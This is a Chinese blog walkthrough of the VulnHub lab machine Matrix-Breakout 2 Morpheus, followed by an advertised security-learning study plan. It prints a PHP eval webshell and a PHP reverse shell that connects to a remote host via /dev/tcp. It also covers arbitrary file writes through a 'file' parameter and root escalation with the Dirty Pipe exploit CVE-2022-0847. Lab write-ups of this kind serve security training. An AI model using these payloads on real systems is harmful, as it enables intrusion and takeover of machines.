vulnhub靶场Matrix-Breakout 2 Morpheus教程

* 靶场搭建

靶机下载地址:Matrix-Breakout: 2 Morpheus ~
VulnHub

直接解压双击ova文件即可

使用软件:VMware(可能会出现问题),VirtualBox(此处官方建议使用VirtualBox)

难度:中等

攻击机:kali

* 信息收集

为了方便我直接使用windows上的lansee直接扫描出目标靶机ip

![](https://img-
blog.csdnimg.cn/img_convert/ea896aa661a4f5ca0cdb7a6bbf89d2ff.png)

lansee扫描结果

去除已知靶机ip剩下的就是目标靶机

192.168.21.134

当然需要访问看看

![](https://img-
blog.csdnimg.cn/img_convert/308d7127497686000fe9a8cd1976db39.png)

访问结果

看看源码能出现啥

![](https://img-
blog.csdnimg.cn/img_convert/8889ce5ba0bc93d71436ce8efa5a0732.png)

192.168.21.134网页主页源码

没有什么有用的看看nmap能看出来啥

nmap 192.168.21.143

![](https://img-
blog.csdnimg.cn/img_convert/43429693380c2c6fdc64b67c96c2f2aa.png)

nmap简单扫描结果

看看端口详细信息

nmap -A -T4 -p- 192.168.21.143

![](https://img-
blog.csdnimg.cn/img_convert/416e1fdc5eb7b267650622b2a8d1c7aa.png)

nmap扫描到的详细信息

这也没有看到什么有用的信息,端口都想需要登入。

此处只能进行文件爆破了,看看能不能扫出来啥

ffuf -u http://192.168.21.143/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

查找该网站下的txt,zip,php,html文件

![](https://img-
blog.csdnimg.cn/img_convert/dace0b399262715d5a4c3b40a5c50936.png)

ffuf扫描结果

于是我们看到这几个文件:

robots.txt
graffiti.txt
graffiti.php

这些肯定都要去看看

![](https://img-
blog.csdnimg.cn/img_convert/801d02c89aeb048dda787ab47b8a1b57.png)

graffiti.txt和graffiti.php访问结果

此处试试看输入会发生什么

![](https://img-
blog.csdnimg.cn/img_convert/badcecda1399b9f689d87cd0fa607b2b.png)

发现此处输入的内容会保存在txt文件中,先抓个包看看变量名是啥

![](https://img-
blog.csdnimg.cn/img_convert/dd81e41d92c8389fcb22c18d3cac5ece.png)

burp抓包结果

此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件

二话不说写个马,准备反弹shell

<?php eval(@$_POST['password']);?>

![](https://img-
blog.csdnimg.cn/img_convert/ab48f0beca93be6036fb8dfc8ab7396e.png)

burp发送包

访问试试,看看成功创建了没

![](https://img-
blog.csdnimg.cn/img_convert/0c7cd1f0192d86d7fb819b615d71d279.png)

shell访问结果

白屏就是访问成功了,此处使用webshell管理工具就能直接链接

为了方便就直接用蚁剑直接拦截

![](https://img-
blog.csdnimg.cn/img_convert/05b7095fea5a2eb7726f7d907088c837.png)

蚁剑链接结果

![](https://img-
blog.csdnimg.cn/img_convert/c10138341d8f8973fc89bf4c0fea4f9c.png)

看到文件

蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.21.143/666 0>&1'"); ?>

![](https://img-
blog.csdnimg.cn/img_convert/d651721bb4f03f4a5ab15a75404a6a64.png)

文件发包

访问文件即可即可反弹shell

![](https://img-
blog.csdnimg.cn/img_convert/712a91511c7ce28c30212a2b52eb21e1.png)

反弹shell结果

轻松拿到提示

![](https://img-
blog.csdnimg.cn/img_convert/db213f286bad32a1cfee2d3c0c6df4e6.png)

flag一般会在home里,先去看看也没事

ls -al /home

建议使用-al可以直接看到所有文件

![](https://img-
blog.csdnimg.cn/img_convert/151ed0f19c6a7a1f12792ad76551a463.png)

此处只能访问唯独一个的文件夹了,看看里面有啥

![](https://img-
blog.csdnimg.cn/img_convert/57e8330a074b2193ff79d9745afa9066.png)

根本没啥用,去原来的目录看看

![](https://img-
blog.csdnimg.cn/img_convert/814be7041313e6194ceb8a520a7a85f3.png)

去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来

http://192.168.21.143/.cypher-neo.png

![](https://img-
blog.csdnimg.cn/img_convert/a0c8342375fa593ffa31f4f516185c79.png)

图片访问结果

问题就是它了,网站上看不出来问题下载下看看

wget http://192.168.21.143/.cypher-neo.png
binwalk .cypher-neo.peng.1

![](https://img-
blog.csdnimg.cn/img_convert/21ca0e4373597a139408965062c2cace.png)

!!!!捆绑好家伙行

binwalk -e .cypher-neo.png.1 --run-as=root

![](https://img-
blog.csdnimg.cn/img_convert/4647c07380bf33d4f2a6b95eaae43535.png)

进去看看有啥

![](https://img-
blog.csdnimg.cn/img_convert/2fe6def69027b714cfae2d18f973f9ad.png)

查看文件,此处脑子烧了zlib之后再写吧


zlib分析文章

https://blog.csdn.net/qq_40574571/article/details/80164981

https://www.cnblogs.com/ainsliaea/p/15780903.html


剩下来的就是提权了

系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847

https://gitcode.net/mirrors/r1is/CVE-2022-0847

下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)

给权限直接跑

chmod +x dirty.sh

![](https://img-
blog.csdnimg.cn/img_convert/a24006abdacdffca606c6a61b0d73997.png)

这里要记得回复原来的密码能直接变更权限

![](https://img-
blog.csdnimg.cn/img_convert/5024ecfaed3d317cb7a681f9db430ea6.png)

拿到root权限和flag靶机结束

接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

  • 37
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值